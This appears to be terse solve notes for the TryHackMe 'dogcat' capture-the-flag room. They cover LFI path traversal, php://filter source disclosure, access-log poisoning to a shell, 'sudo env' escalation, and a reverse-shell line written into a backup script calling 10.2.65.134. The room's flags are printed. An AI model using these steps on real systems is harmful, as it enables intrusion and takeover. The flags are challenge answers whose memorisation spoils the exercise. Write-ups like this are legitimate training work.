Date:8/mar/2021
time:22:25

http://10.10.164.103/?view=../../../../etc/cat/../passwd&ext=
http://10.10.164.103/?view=../../../../var/log/apache2/cat/../access.log&ext=
			
http://10.10.33.178/?view=php://filter/convert.base64-encode/resource=dog
└─$ echo "PGltZyBzcmM9ImRvZ3MvPD9waHAgZWNobyByYW5kKDEsIDEwKTsgPz4uanBnIiAvPg0K" | base64 -d 


http://10.10.33.178/?view=php://filter/convert.base64-encode/resource=dog/../index

http://10.10.149.130/?view=php://filter/convert.base64-encode/cat/resource=flag
└─$ echo "PD9waHAKJGZsYWdfMSA9ICJUSE17VGgxc18xc19OMHRfNF9DYXRkb2dfYWI2N2VkZmF9Igo" | base64 -d
<?php
$flag_1 = "THM{Th1s_1s_N0t_4_Catdog_ab67edfa}"

start burp
http://10.10.149.130/?view=../../../../var/log/apache2/cat/../access.log&ext=
refresh
chanage user-agent 
└─$ rlwrap nc -lvnp 9999                                                                                                                                  1 ⨯
http://10.10.149.130/shell.php
boom!!!! baby

whoami
cd /var/www
cat flag2_QMW7JvaY2LvK.txt
THM{LF1_t0_RC3_aec3fb}

sudo -l
sudo env /bin/sh
cd /root
ls
flag3.txt
cat flag3.txt
THM{D1ff3r3nt_3nv1ronments_874112}

cd /opt
cd backups
echo "#!/bin/bash" > backup.sh
echo 'bash -i >& /dev/tcp/10.2.65.134/4444 0>&1
└─$ nc -lvnp 4444           
wait for some time patience is the key
root@dogcat:~# cat flag4.txt
cat flag4.txt
THM{esc4l4tions_on_esc4l4tions_on_esc4l4tions_7a52b17dba6ebb0dc38bc1049bcba02d}
                      
ending date:2/apr/2021
time:00:20

